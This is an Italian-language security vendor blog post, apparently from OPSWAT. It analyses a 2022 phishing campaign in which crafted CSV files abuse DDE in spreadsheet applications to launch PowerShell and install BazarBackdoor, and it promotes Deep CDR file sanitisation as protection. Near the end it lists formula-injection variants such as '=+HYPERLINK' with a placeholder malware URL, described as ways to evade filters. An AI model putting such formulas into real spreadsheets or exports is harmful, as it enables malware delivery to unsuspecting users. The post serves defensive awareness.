Nel febbraio 2022, il ricercatore di malware Chris Campbell ha individuato una nuova campagna di phishing che utilizzava file di testo CSV (valori separati da virgola) appositamente modificati per infettare i dispositivi degli utenti con il trojan BazarBackdoor. In questo articolo del blog analizziamo lo scenario dell'attacco e vi mostriamo come prevenire questo sofisticato attacco grazie alla tecnologia Deep CDR™
(Content Disarm and Reconstruction).
La tattica di attacco
In questa campagna di phishing, i criminali informatici hanno utilizzato un file CSV, un file di testo delimitato che memorizza i dati in un formato tabellare e utilizza una virgola per separare i valori. Questo tipo di file è un modo popolare per scambiare dati semplici tra database e applicazioni. Poiché un file CSV contiene semplicemente del testo senza codice eseguibile, molti utenti pensano che sia innocuo e aprono rapidamente il documento senza alcuna cautela. Non sospettano che il file possa essere un vettore di minacce attraverso il quale il malware può entrare nei loro dispositivi se il file CSV viene aperto con applicazioni che supportano lo scambio dinamico di dati (DDE), come Microsoft Excel e OpenOffice Calc. Queste applicazioni possono eseguire le formule e le funzioni contenute nel file CSV. Gli autori delle minacce abusano di questa funzione DDE per eseguire comandi arbitrari, che scaricano e installano il trojan BazarBackdoor, per compromettere e ottenere l'accesso completo alle reti aziendali dal dispositivo dell'ignara vittima. Rispetto agli approcci di attacco più diffusi, che prevedono una macro dannosa o un codice VBA nascosto in un file MS Office, le minacce nascoste all'interno dei documenti DDE sono più difficili da rilevare.
Esaminando attentamente il file, si può notare un comando =WmiC| (Windows Management Interface Command) contenuto in una delle colonne di dati. Se le vittime permettono inavvertitamente l'esecuzione di questa funzione DDE, essa creerà un comando PowerShell. Il comando aprirà quindi un URL remoto per scaricare un BazarLoader e BazarBackdoor verrà installato sul computer della vittima.
In che modo la tecnologia Deep CDR™ ti aiuta a proteggerti dagli attacchi DDE
È possibile proteggere la propria rete da queste sofisticate campagne di phishing sottoponendo a sanificazione i file allegati alle e-mail prima che raggiungano gli utenti. Partendo dal presupposto che ogni file rappresenti una potenziale minaccia e concentrandosi sulla prevenzione piuttosto che sul semplice rilevamento, la tecnologia Deep CDR™ elimina tutti i contenuti attivi dai file, mantenendone inalterate l'usabilità e la funzionalità. La tecnologia Deep CDR™ è una delle sei tecnologie chiave di MetaDefender la piattaforma avanzata di prevenzione delle minacce OPSWATche abbraccia pienamente la filosofia Zero Trust.
Di seguito sono riportati i dettagli della sanificazione dopo l'elaborazione del file CSV infetto con MetaDefender Core è possibile consultare anche i risultatidella scansione su MetaDefender Cloud). La tecnologia Deep CDR™ ha neutralizzato la formula contenuta nel file, impedendo la creazione di comandi PowerShell. Di conseguenza, il malware non è stato scaricato.
In attacchi simili, gli autori delle minacce utilizzano formule più complesse per eludere il rilevamento. Normalmente, le formule in MS Excel iniziano con un segno di uguale (=). Tuttavia, poiché questa applicazione accetta anche formule che iniziano con un segno diverso, come "=+"o "@", invece del solo "=", la formula distruttiva nei file CSV può essere:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Questo tipo di formule può sfuggire ad alcuni sistemi CDR comuni. Tuttavia, la tecnologia Deep CDR™ è in grado di gestire facilmente questa tattica e di generare file puliti e sicuri da utilizzare, neutralizzando così la minaccia.
Scopri di più sullatecnologia Deep CDR™ oppure rivolgiti a un esperto OPSWAT per individuare le migliori soluzioni di sicurezza per proteggere la tua rete aziendale e i tuoi utenti dagli attacchi zero-day e dal malware avanzato in grado di eludere i sistemi di difesa.
